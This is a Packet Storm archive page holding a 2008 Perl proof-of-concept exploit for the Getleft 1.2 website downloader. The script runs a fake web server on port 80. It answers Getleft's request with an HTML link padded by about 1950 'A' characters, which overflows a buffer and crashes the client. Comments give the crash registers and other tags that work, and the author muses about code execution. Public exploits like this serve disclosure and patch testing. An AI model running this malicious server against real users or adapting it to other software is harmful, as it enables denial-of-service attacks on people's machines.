what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Getleft 1.2 Buffer Overflow

Getleft 1.2 Buffer Overflow
Posted Dec 30, 2008
Authored by koshi

Getleft version 1.2 proof of concept buffer overflow exploit that causes a denial of service condition.

tags | exploit, denial of service, overflow, proof of concept
SHA-256 | 5519139bcfb084e1b5afe1d514b6af3c2bb23bae05e899b6954e99cec7a4bfc2

Getleft 1.2 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
# Getleft v1.2.0.0 DoS PoC
# Author: Koshi
#
# Application: Getleft v1.2
# Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html )
# Description: Website Downloader, for such things as offline browsing.
# Tested On: Windows XP SP2
#
# Module: Getleft.exe
# eax=00c5f170 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00c5f170
# eip=004863eb esp=0022d9b0 ebp=010b4870 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
#
# Getleft+0x863eb:
# 004863eb 8b06 mov eax,dword ptr [esi] ds:0023:00000000=????????
#
# <embed src=>, <img src=>, <script src=>, <body background=>
# Plenty of other tags will work as well. I'm not so sure about
# code execution, I'll have to try a few other things.
#

use IO::Socket;

my $body = "<a href=\x22/abcd.jpg\x22>" ."A"x1950 ."</a>";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Server: Apache\r\n".
"Date: Mon, 22 Dec 2008 21:50:46 GMT\r\n".
"Content-Type: text/html\r\n".
"Accept-Ranges: bytes\r\n".
"Last-Modified: Mon, 22 Dec 2008 21:45:46 GMT\r\n".
"Content-Length: " .length($body) ."\r\n".
"Connection: close\r\n\r\n".
"$body\r\n";

for ($i = 2; $i >= 1; $i--) {

my $sock = new IO::Socket::INET (LocalPort => '80',
Proto => 'tcp',
Listen => 1,
Reuse => 1, );

print "Listening...\n";
my $new_sock = $sock->accept();
print "Connected...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending ...\n";
print $new_sock "$resp";
print "Sent!\n";
close($sock);
print "Closed.\r\n\r\n";

}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close